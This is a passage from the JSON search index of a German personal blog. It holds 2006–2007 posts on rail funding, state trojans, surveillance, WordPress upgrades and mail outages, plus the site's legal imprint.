target=\"_blank\"\u003eTagesschau \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\n\u003ca href=\"http://www.tagesschau.de/aktuell/meldungen/0,,OID6369592_,00.html\" target=\"_blank\"\u003emeldet\nheute \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, daß die DB mehr Geld für neue Züge ausgeben möchte. Herr Mehdorn\nfordert von der Bundesregierung sogar mehr Geld, da bereits alle\nzugewiesenen Mittel verplant sind.\u003c/p\u003e\n\u003cp\u003eMeiner Meinung nach liegt der Geldmangel der Bahn u.a. daran, daß\n\u003ca href=\"http://www.attac.de/aktuell/presse/presse_ausgabe.php?id=616\" target=\"_blank\"\u003enoch\nbenutzbare Züge verschrottet werden \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, um Konkurrenten gar nicht erst auf\ndie Idee kommen zu lassen, daß man mit den alten Interregios ins\nGeschäft einsteigen könnte. Die Interregios wurden von Steuergelder\nbezahlt! Genau wie die jetzt angekündigten neuen Züge und dann\nverschrottet, anstatt sie an ausländische oder inländische\nBahngesellschaften zu verkaufen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-03-tagesschau-mehdorn-will-milliarden-fur-neue-zuge-ausgeben/","title":"Tagesschau: Mehdorn will Milliarden für neue Züge ausgeben"},{"body":"Am kommenden Montag entscheidet der Bundesgerichtshof über die Rechtmäßigkeit von Onlinedurchsuchungen mit dem sogenannten Bundestrojaner !\nHier ist meiner Meinung nach dringend eine Entscheidung bzw. Absage notwendig, da hier ohne Anwesenheit des Verdächtigen Computer durchsucht werden. Bei den Hausdurchsuchungen darf man selbst noch dabei sein. Hier hat man keine Handhabe.\nWer sagt eigentlich, daß mit dem Trojaner keine Daten den Computern hinzugefügt werden?\ns.a. Heise News ","excerpt":"\u003cp\u003eAm kommenden Montag entscheidet der\n\u003ca href=\"http://www.bundesgerichtshof.de/\" target=\"_blank\"\u003eBundesgerichtshof \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n über die\nRechtmäßigkeit von Onlinedurchsuchungen mit dem sogenannten\n\u003ca href=\"http://de.wikipedia.org/wiki/Bundestrojaner\" target=\"_blank\"\u003eBundestrojaner \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n!\u003c/p\u003e\n\u003cp\u003eHier ist meiner Meinung nach dringend eine Entscheidung bzw. Absage\nnotwendig, da hier ohne Anwesenheit des Verdächtigen Computer durchsucht\nwerden. Bei den Hausdurchsuchungen darf man selbst noch dabei sein. Hier\nhat man keine Handhabe.\u003c/p\u003e\n\u003cp\u003eWer sagt eigentlich, daß mit dem Trojaner keine Daten den Computern\nhinzugefügt werden?\u003c/p\u003e\n\u003cp\u003es.a. \u003ca href=\"http://www.heise.de/newsticker/meldung/84726\" target=\"_blank\"\u003eHeise News \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-02-03-bgh-entscheidet-am-montag-uber-den-bundestrojaner/","title":"BGH entscheidet am Montag über den Bundestrojaner"},{"body":"So,\njetzt hab ich mal kurz nebenbei auf die neue WordPress-Version aktualisiert. Nach Sicherung des WordPress-Verzeichnisses und der Datenbank war es nach der Anleitung kein Problem. Auch die Plugins funktionieren alle noch.\nDie einzige Neuerung, die mir aufgefallen ist, waren die Tabs beim Beiträge schreiben (Visual / Code), mit denen die Textbearbeitung vereinfacht wird.\nUpgrade Anleitung\nNeuerungen in 2.1\nUpdate:\nDie Links im Sidebar gehen nicht mehr. Da muss ich morgen die Blogroll noch überarbeiten.\n**Update 2007-01-24:\nEs gibt eine neue Funktion in WordPress, um die Links inkl. Kategorie einzublenden: \u0026lt;?php wp_list_bookmarks(); ?\u0026gt;\nSo, jetzt hab ich gleich noch das Theme aktualisiert. Ich nutze jetzt Blue Zinfandel 2.0 Squared von Brian Gardner. Das Theme ist nicht komplett eingedeutscht, das stört aber meiner Meinung nach, nicht besonders.\n","excerpt":"\u003cp\u003eSo,\u003c/p\u003e\n\u003cp\u003ejetzt hab ich mal kurz nebenbei auf die neue WordPress-Version\naktualisiert. Nach Sicherung des WordPress-Verzeichnisses und der\nDatenbank war es nach der Anleitung kein Problem. Auch die Plugins\nfunktionieren alle noch.\u003c/p\u003e\n\u003cp\u003eDie einzige Neuerung, die mir aufgefallen ist, waren die Tabs beim\nBeiträge schreiben (Visual / Code), mit denen die Textbearbeitung\nvereinfacht wird.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eUpgrade Anleitung\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eNeuerungen in 2.1\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003e\u003cstrong\u003eUpdate:\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eDie Links im Sidebar gehen nicht mehr. Da muss ich morgen die Blogroll\nnoch überarbeiten.\u003c/p\u003e\n\u003cp\u003e**Update 2007-01-24:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eEs gibt eine neue Funktion in WordPress, um die Links inkl. Kategorie\neinzublenden:\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003e\u0026lt;?php wp_list_bookmarks(); ?\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eSo, jetzt hab ich gleich noch das Theme aktualisiert. Ich nutze jetzt\n\u003ca href=\"http://www.briangardner.com/themes/blue-zinfandel-squared-wordpress-theme.htm\" target=\"_blank\"\u003eBlue\nZinfandel 2.0 Squared \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n von Brian Gardner. Das Theme ist nicht komplett\neingedeutscht, das stört aber meiner Meinung nach, nicht besonders.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-23-wordpress-update-auf-21-hat-geklappt/","title":"WordPress Update auf 2.1 hat geklappt"},{"body":"Jetzt reicht es scheinbar nicht mehr, daß die Werbestrategen in Deutschland oder International unsere Spuren im Internet oder bei Einkäufen verfolgen, jetzt bekommen Sie auch noch Hilfe von den Behörden.\nEs ist geplant, daß mit den neuen Personalausweisen auch der Zugriff auf unsere Daten vereinfacht wird.\nDie Daten die viele von uns bei Amazon oder auf Payback (die Firmen seien hier beispielhaft bedacht) hinterlassen sind an sich freiwillig, wenn sich aber sicher nicht viele Teilnehmer im Klaren sind, welche tollen Profile über sie erstellt werden können.\nJetzt sollen angeblich auch Personalausweisdaten von der Bundesregierung verkauft werden. Es ist angeblich geplant, daß Firmen, die auf die Ausweisdaten zurückgreifen wollen (z.B. als Altersnachweis), Berechtigungsnachweise kaufen müssen. Dadurch sollen die höheren Kosten abgefangen werden.\nsilicon.de de.internet.com archiv.chip.de kuppingercole.de zeit.de Update:\nDie Meldungen sind an sich nicht neu! Diese Nachrichten geistern seit min. einem Jahr durchs Netz. Aber so richtig widersprochen hat auch noch niemand. Die elektronische Melderegisterauskunft gibt es jetzt seit 1.1.07 und das reicht meiner Meinung nach auch schon.\nHier noch ein passender Artikel auf Telepolis / Heise. ","excerpt":"\u003cp\u003eJetzt reicht es scheinbar nicht mehr, daß die Werbestrategen in\nDeutschland oder International unsere Spuren im Internet oder bei\nEinkäufen verfolgen, jetzt bekommen Sie auch noch Hilfe von den\nBehörden.\u003c/p\u003e\n\u003cp\u003eEs ist geplant, daß mit den neuen Personalausweisen auch der Zugriff auf\nunsere Daten vereinfacht wird.\u003c/p\u003e\n\u003cp\u003eDie Daten die viele von uns bei Amazon oder auf Payback (die Firmen\nseien hier beispielhaft bedacht) hinterlassen sind an sich freiwillig,\nwenn sich aber sicher nicht viele Teilnehmer im Klaren sind, welche\ntollen Profile über sie erstellt werden können.\u003c/p\u003e\n\u003cp\u003eJetzt sollen angeblich auch Personalausweisdaten von der Bundesregierung\nverkauft werden. Es ist angeblich geplant, daß Firmen, die auf die\nAusweisdaten zurückgreifen wollen (z.B. als Altersnachweis),\nBerechtigungsnachweise kaufen müssen. Dadurch sollen die höheren Kosten\nabgefangen werden.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-21-behordlicher-adresshandel/","title":"Behördlicher Adresshandel"},{"body":"Momentan ist der Mailserver immer noch nicht ganz auf dem Damm.\nIch kann eine meiner Mailadressen weder über die Weboberfläche, noch über IMAP abrufen.\nhttp://www.heise.de/newsticker/meldung/83737 Komischerweise liest man nicht mehr viel zu dem Problem. Von Heise kommen keine Aktualisierung, aber die Foreneinträge werden immer mehr.\nUpdate 19.1.2007:\nGestern gingen die Serverprobleme bei 1\u0026amp;1 weiter. Es gibt bislang auch keine nähere Informationen, wie es zu dem Fehler kommen konnte. Ich kann einen leeren Cache nicht so recht glauben!\ns.a. http://www.heise.de/newsticker/meldung/83916 ","excerpt":"\u003cp\u003eMomentan ist der Mailserver immer noch nicht ganz auf dem Damm.\u003c/p\u003e\n\u003cp\u003eIch kann eine meiner Mailadressen weder über die Weboberfläche, noch\nüber IMAP abrufen.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/83737\" target=\"_blank\"\u003ehttp://www.heise.de/newsticker/meldung/83737 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eKomischerweise liest man nicht mehr viel zu dem Problem. Von Heise\nkommen keine Aktualisierung, aber die Foreneinträge werden immer mehr.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eUpdate 19.1.2007:\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eGestern gingen die Serverprobleme bei 1\u0026amp;1 weiter. Es gibt bislang auch\nkeine nähere Informationen, wie es zu dem Fehler kommen konnte. Ich kann\neinen leeren Cache nicht so recht glauben!\u003c/p\u003e\n\u003cp\u003es.a. \u003ca href=\"http://www.heise.de/newsticker/meldung/83916\" target=\"_blank\"\u003ehttp://www.heise.de/newsticker/meldung/83916 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-16-mailserver-11/","title":"Mailserver 1\u00261"},{"body":"Hier noch drei interessante Links zu Windows Vista. Es ist doch immer wieder schön, daß Microsoft und die NSA nur unser Bestes will. Naja inzwischen spielt bei der Betriebssystemsicherheit auch das BKA und unsere Regierung eine Rolle.\nhttp://oraclesyndicate.twoday.net/stories/3169843/ http://www.golem.de/0612/49655.html http://www.cs.auckland.ac.nz/~pgut001/pubs/vista_cost.txt ","excerpt":"\u003cp\u003eHier noch drei interessante Links zu Windows Vista. Es ist doch immer\nwieder schön, daß Microsoft und die NSA nur unser Bestes will. Naja\ninzwischen spielt bei der Betriebssystemsicherheit auch das BKA und\nunsere Regierung eine Rolle.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://oraclesyndicate.twoday.net/stories/3169843/\" target=\"_blank\"\u003ehttp://oraclesyndicate.twoday.net/stories/3169843/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.golem.de/0612/49655.html\" target=\"_blank\"\u003ehttp://www.golem.de/0612/49655.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.cs.auckland.ac.nz/~pgut001/pubs/vista_cost.txt\" target=\"_blank\"\u003ehttp://www.cs.auckland.ac.nz/~pgut001/pubs/vista_cost.txt \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-14-windows-vista/","title":"Windows Vista"},{"body":"Deutschland hat nach den USA und Rußland begonnen Radarsatelliten ins All zu schiessen, um angeblich den neuen Aufgaben besser gewachsen zu sein.\nDieses Projekt kostet nicht nur immens viel Geld, sondern stellt mich vor die Frage, vor was wir uns schützen müssen? Vor islamischen Terroristen, oder unserem Staat mit seinen Organen?\nSiehe auch:\nhttp://www.heise.de/tp/…/1.html ]1 http://www.heise.de/tp/…/1.html http://www.streitkraeftebasis.de/portal/…/Fcontent.jsp http://www.uni-kassel.de/…/sar-lupe.html ","excerpt":"\u003cp\u003eDeutschland hat nach den USA und Rußland begonnen Radarsatelliten ins\nAll zu schiessen, um angeblich den neuen Aufgaben besser gewachsen zu\nsein.\u003c/p\u003e\n\u003cp\u003eDieses Projekt kostet nicht nur immens viel Geld, sondern stellt mich\nvor die Frage, vor was wir uns schützen müssen? Vor islamischen\nTerroristen, oder unserem Staat mit seinen Organen?\u003c/p\u003e\n\u003cp\u003eSiehe auch:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"http://www.heise.de/tp/%e2%80%a6/1.html\" target=\"_blank\"\u003ehttp://www.heise.de/tp/…/1.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]\u003ca href=\"http://www.heise.de/tp/r4/artikel/24/24016/1.html\" target=\"_blank\"\u003e1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"http://www.heise.de/tp/r4/artikel/24/24351/1.html\" target=\"_blank\"\u003ehttp://www.heise.de/tp/…/1.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"http://www.streitkraeftebasis.de/portal/a/streitkraeftebasis/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLt4g3cQsBSUGYwfqRMLGglFR9b31fj_zcVP0A_YLciHJHR0VFACDw1Fg!/delta/base64xml/L2dJQSEvUUt3QS80SVVFLzZfOF9PSko!?yw_contentURL=%2F01DB040000000001%2FW26WPJ8X160INFODE%2Fcontent.jsp\" target=\"_blank\"\u003ehttp://www.streitkraeftebasis.de/portal/…/Fcontent.jsp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"http://www.uni-kassel.de/fb5/frieden/themen/Waffen/sar-lupe.html\" target=\"_blank\"\u003ehttp://www.uni-kassel.de/…/sar-lupe.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2007/2007-01-14-warum-braucht-deutschland-radarsatelliten/","title":"Warum braucht Deutschland Radarsatelliten?"},{"body":"Solche Meldungen nerven einfach. Warum muss bei uns in Deutschland alles digitalisiert und in Datenbanken gesammelt werden?\nBiometrische Erfassung von Schülern für die Essensausgabe in Offenburg , Schüler-ID in Nordrhein-Westfalen …\nIch sehe hier sehr bedenkliche Strömungen zu einem Überwachungsstaat, den jeder sogar freiwillig unterstützt, weil man ja nichts zu verbergen hat. Es ist ja auch egal, daß trotz gesetzlichem Verbot jeden zweiten Tag irgendeine Firma anruft und ihren Schrott verkaufen möchte, trotzdem wird gesetzlich die Telefonnummer im Web-Impresssum verlangt.\nElster ist zwar nicht sicher, aber trotzdem wird von jedem Einzelunternehmer erwartet, daß er\ndie Steuernummer im Impressum nennt er seine Steuerunterlagen per Computer einreicht ein Jahr später für den dazu beschafften Computer GEZ-Gebühren bezahlt Wo soll das eigentlich hinführen?\nMüssen wir wirklich die Religionsnoten unserer Schüler in zentralen Datenbanken ablegen?\nUnd warum kommt in diesen Datensatz auch noch die “Stellung im Beruf und Wohnort”? Man kann mir wirklich viel erzählen, aber spätestens hier sehe ich trotz angeblicher Anonymisierung ein riesiges Missbrauchspotential.\nWann ist es eigentlich soweit, daß überall Überwachungskameras installiert sind, die RFID-Reisepässe unter die Haut implantiert werden und die Strafzettel durch unser integriertes Fax gleich zugestellt und abgebucht werden?\nOriginal-Nachricht bei Heise ","excerpt":"\u003cp\u003eSolche Meldungen nerven einfach. Warum muss bei uns in Deutschland alles\ndigitalisiert und in Datenbanken gesammelt werden?\u003c/p\u003e\n\u003cp\u003eBiometrische Erfassung von Schülern für die\n\u003ca href=\"http://www.heise.de/newsticker/meldung/82817\" target=\"_blank\"\u003eEssensausgabe in\nOffenburg \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, Schüler-ID in Nordrhein-Westfalen …\u003c/p\u003e\n\u003cp\u003eIch sehe hier sehr bedenkliche Strömungen zu einem Überwachungsstaat,\nden jeder sogar freiwillig unterstützt, weil man ja nichts zu verbergen\nhat. Es ist ja auch egal, daß trotz gesetzlichem Verbot jeden zweiten\nTag irgendeine Firma anruft und ihren Schrott verkaufen möchte, trotzdem\nwird gesetzlich die Telefonnummer im Web-Impresssum verlangt.\u003c/p\u003e\n\u003cp\u003eElster ist zwar nicht sicher, aber trotzdem wird von jedem\nEinzelunternehmer erwartet, daß er\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003edie Steuernummer im Impressum nennt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eer seine Steuerunterlagen per Computer einreicht\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eein Jahr später für den dazu beschafften Computer GEZ-Gebühren bezahlt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eWo soll das eigentlich hinführen?\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-14-bei-den-schulern-wird-es-wohl-getestet/","title":"Bei den Schülern wird es wohl getestet"},{"body":"Ich versuche seit mehreren Tagen mit Heggi einen Videochat zu machen, leider bekommen wir das noch nicht gebacken.\nIch benutze iChat (nur für Video, ansonsten AdiumX ) und Heggi einen Windows-Client der Video unterstützt.\nVon Macbook zu iMac war Videochat mit Jabberaccounts kein Problem und lief innerhalb von Minuten problemlos. Die Kommunikation zwischen Win und Mac klappt aber überhaupt nicht. Wenn jemand Ideen hat, wie das gehen könnte, dann schreibt bitte einen Kommentar!\nWeiterführende Links:\nmvldesign Apfelwiki ","excerpt":"\u003cp\u003eIch versuche seit mehreren Tagen mit Heggi einen Videochat zu machen,\nleider bekommen wir das noch nicht gebacken.\u003c/p\u003e\n\u003cp\u003eIch benutze \u003ca href=\"http://de.wikipedia.org/wiki/iChat\" target=\"_blank\"\u003eiChat \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n (nur für Video,\nansonsten \u003ca href=\"http://www.adiumx.com\" target=\"_blank\"\u003eAdiumX \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n) und Heggi einen Windows-Client\nder Video unterstützt.\u003c/p\u003e\n\u003cp\u003eVon Macbook zu iMac war Videochat mit Jabberaccounts kein Problem und\nlief innerhalb von Minuten problemlos. Die Kommunikation zwischen Win\nund Mac klappt aber überhaupt nicht. Wenn jemand Ideen hat, wie das\ngehen könnte, dann schreibt bitte einen Kommentar!\u003c/p\u003e\n\u003cp\u003eWeiterführende Links:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.mvldesign.com/video_conference_tutorial.html\" target=\"_blank\"\u003emvldesign \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.apfelwiki.de/Main/IChat/#toc10\" target=\"_blank\"\u003eApfelwiki \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-03-videochat-zwischen-mac-ichat-und-windows/","title":"Videochat zwischen Mac (iChat) und Windows"},{"body":"Ich habe heute versucht, mir eine Seite mit allen Links, die ich in WordPress eingegeben habe zu erstellen.\nErste Station bei meiner Plugin-Suche war folgender Link: Links Page , leider hatte der Autor Serverprobleme und man konnte den Download nicht starten.\nDa WordPress sehr viele PHP-Funktionen für die Ausgabe von Links mitbringt, habe ich mir das Plugin RunPHP installiert. Der Vorteil von RunPHP gegenüber ähnlichen Plugins ist, daß für jede Seite oder jeden Beitrag einzeln entschieden werden kann, ob PHP-Code ausgeführt wird, oder nicht.\nDanach den Wysiwyg-Editor in den Voreinstellungen deaktiviert und folgenden Code als Seitentext eingegeben:\n\u0026lt;ul\u0026gt;\u0026lt;br /\u0026gt; \u0026lt;?php get_links(\u0026#39;-1\u0026#39;,\u0026#39;\u0026lt;li\u0026gt;\u0026#39;,\u0026#39;\u0026lt;/li\u0026gt;\u0026#39;,\u0026#39;-\u0026#39;,TRUE,\u0026#39;name\u0026#39;,TRUE);?\u0026gt;\u0026lt;br /\u0026gt; \u0026lt;/ul\u0026gt; Eine nähere Beschreibung zu den einzelnen Parametern gibt es im WordPress Wiki .\nDas Ergebnis könnt ihr auf der Seite Links anschauen.\n","excerpt":"\u003cp\u003eIch habe heute versucht, mir eine Seite mit allen Links, die ich in\nWordPress eingegeben habe zu erstellen.\u003c/p\u003e\n\u003cp\u003eErste Station bei meiner Plugin-Suche war folgender Link:\n\u003ca href=\"http://redalt.com/downloads/\" target=\"_blank\"\u003eLinks Page \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, leider hatte der Autor\nServerprobleme und man konnte den Download nicht starten.\u003c/p\u003e\n\u003cp\u003eDa \u003ca href=\"http://www.wordpress-deutschland.org\" target=\"_blank\"\u003eWordPress \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n sehr viele\nPHP-Funktionen für die Ausgabe von Links mitbringt, habe ich mir das\nPlugin\n\u003ca href=\"http://www.nosq.com/blog/2006/01/runphp-plugin-for-wordpress/\" target=\"_blank\"\u003eRunPHP \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\ninstalliert. Der Vorteil von RunPHP gegenüber ähnlichen Plugins ist, daß\nfür jede Seite oder jeden Beitrag einzeln entschieden werden kann, ob\nPHP-Code ausgeführt wird, oder nicht.\u003c/p\u003e\n\u003cp\u003eDanach den Wysiwyg-Editor in den Voreinstellungen deaktiviert und\nfolgenden Code als Seitentext eingegeben:\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-01-01-links-seite-mit-wordpress/","title":"Übersicht aller Links mit WordPress"},{"body":"Wir ihr vielleicht gesehen habt, bin ich mit der Einrichtung des Blogs noch nicht ganz fertig. Das Layout ist zwar fast perfekt, aber einige Kleinigkeiten fehlen einfach noch.\nAls nächstes hätte ich noch gerne eine Tagwolke von del.icio.us!\nUm es nicht zu versäumen, an dieser Stelle einen Guten Rutsch ins Jahr 2007!\n","excerpt":"\u003cp\u003eWir ihr vielleicht gesehen habt, bin ich mit der Einrichtung des Blogs noch nicht ganz fertig. Das Layout ist zwar fast perfekt, aber einige Kleinigkeiten fehlen einfach noch.\u003c/p\u003e\n\u003cp\u003eAls nächstes hätte ich noch gerne eine Tagwolke von del.icio.us!\u003c/p\u003e\n\u003cp\u003eUm es nicht zu versäumen, an dieser Stelle einen Guten Rutsch ins Jahr\n2007!\u003c/p\u003e","ref":"https://stoeps.de/posts/2006/2006-12-31-guten-rutsch/","title":"Guten Rutsch!"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/blog/","title":"Blog"},{"body":"","excerpt":"","ref":"https://stoeps.de/","title":"Have you closed all Windows - stories from stoeps"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hugo/","title":"Hugo"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/ibm-connections/","title":"Ibm-Connections"},{"body":"Angaben gemäß § 5 TMG Christoph Stoettner\nWerlestraße 19\n64646 Heppenheim\nKontakt Telefon: +49 173 8588719\nE-Mail: christoph.stoettner@stoeps.de Meine Meinung „Dies ist mein privater Blog. Alle hier getätigten Aussagen und publizierten Inhalte stellen ausschließlich meine persönliche Meinung dar. Bei etwaigen Überschneidungen mit meiner beruflichen Tätigkeit für die Vegard IT GmbH sei daher darauf hingewiesen, dass es sich nicht um die Meinung meines Arbeitgebers handelt.“\nVerantwortlich für den Inhalt nach § 55 Abs. 2 RStV Christoph Stoettner\nHaftung für Inhalte Als Diensteanbieter sind wir gemäß § 7 Abs.1 TMG für eigene Inhalte auf diesen Seiten nach den allgemeinen Gesetzen verantwortlich. Nach §§ 8 bis 10 TMG sind wir als Diensteanbieter jedoch nicht verpflichtet, übermittelte oder gespeicherte fremde Informationen zu überwachen oder nach Umständen zu forschen, die auf eine rechtswidrige Tätigkeit hinweisen.\nVerpflichtungen zur Entfernung oder Sperrung der Nutzung von Informationen nach den allgemeinen Gesetzen bleiben hiervon unberührt. Eine diesbezügliche Haftung ist jedoch erst ab dem Zeitpunkt der Kenntnis einer konkreten Rechtsverletzung möglich. Bei Bekanntwerden von entsprechenden Rechtsverletzungen werden wir diese Inhalte umgehend entfernen.\nHaftung für Links Unser Angebot enthält Links zu externen Websites Dritter, auf deren Inhalte wir keinen Einfluss haben. Deshalb können wir für diese fremden Inhalte auch keine Gewähr übernehmen. Für die Inhalte der verlinkten Seiten ist stets der jeweilige Anbieter oder Betreiber der Seiten verantwortlich. Die verlinkten Seiten wurden zum Zeitpunkt der Verlinkung auf mögliche Rechtsverstöße überprüft. Rechtswidrige Inhalte waren zum Zeitpunkt der Verlinkung nicht erkennbar.\nEine permanente inhaltliche Kontrolle der verlinkten Seiten ist jedoch ohne konkrete Anhaltspunkte einer Rechtsverletzung nicht zumutbar. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Links umgehend entfernen.\nUrheberrecht Die Inhalte dieser Seite sind unter der Creative Commons Namensnennung-Share Alike 4.0 International Public License freigegeben.\nSie dürfen: Teilen — das Material in jedwedem Format oder Medium vervielfältigen und weiterverbreiten\nBearbeiten — das Material remixen, verändern und darauf aufbauen und zwar für beliebige Zwecke, sogar kommerziell.\nDiese Lizenz ist geeignet für freie kulturelle Werke.\nDer Lizenzgeber kann diese Freiheiten nicht widerrufen solange Sie sich an die Lizenzbedingungen halten.\nUnter folgenden Bedingungen: Namensnennung — Sie müssen angemessene Urheber- und Rechteangaben machen, einen Link zur Lizenz beifügen und angeben, ob Änderungen vorgenommen wurden. Diese Angaben dürfen in jeder angemessenen Art und Weise gemacht werden, allerdings nicht so, dass der Eindruck entsteht, der Lizenzgeber unterstütze gerade Sie oder Ihre Nutzung besonders.\nWeitergabe unter gleichen Bedingungen — Wenn Sie das Material remixen, verändern oder anderweitig direkt darauf aufbauen, dürfen Sie Ihre Beiträge nur unter derselben Lizenz wie das Original verbreiten.\nKeine weiteren Einschränkungen — Sie dürfen keine zusätzlichen Klauseln oder technische Verfahren einsetzen, die anderen rechtlich irgendetwas untersagen, was die Lizenz erlaubt.\nSoweit die Inhalte auf dieser Seite nicht vom Betreiber erstellt wurden, werden die Urheberrechte Dritter beachtet. Insbesondere werden Inhalte Dritter als solche gekennzeichnet. Sollten Sie trotzdem auf eine Urheberrechtsverletzung aufmerksam werden, bitten wir um einen entsprechenden Hinweis. Bei Bekanntwerden von Rechtsverletzungen werden wir derartige Inhalte umgehend entfernen.\nQuelle (teilweise): https://www.e-recht24.de/impressum-generator.html ","excerpt":"\u003ch2 id=\"angaben-gemäß--5-tmg\"\u003eAngaben gemäß § 5 TMG \u003ca href=\"#angaben-gem%c3%a4%c3%9f--5-tmg\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eChristoph Stoettner\u003cbr\u003e\nWerlestraße 19\u003cbr\u003e\n64646 Heppenheim\u003c/p\u003e\n\u003ch2 id=\"kontakt\"\u003eKontakt \u003ca href=\"#kontakt\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eTelefon: +49 173 8588719\u003cbr\u003e\nE-Mail: \u003ca href=\"mailto:christoph.stoettner@stoeps.de\"\u003echristoph.stoettner@stoeps.de\u003c/a\u003e\n\u003c/p\u003e\n\u003ch2 id=\"meine-meinung\"\u003eMeine Meinung \u003ca href=\"#meine-meinung\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003e„Dies ist mein privater Blog.\nAlle hier getätigten Aussagen und 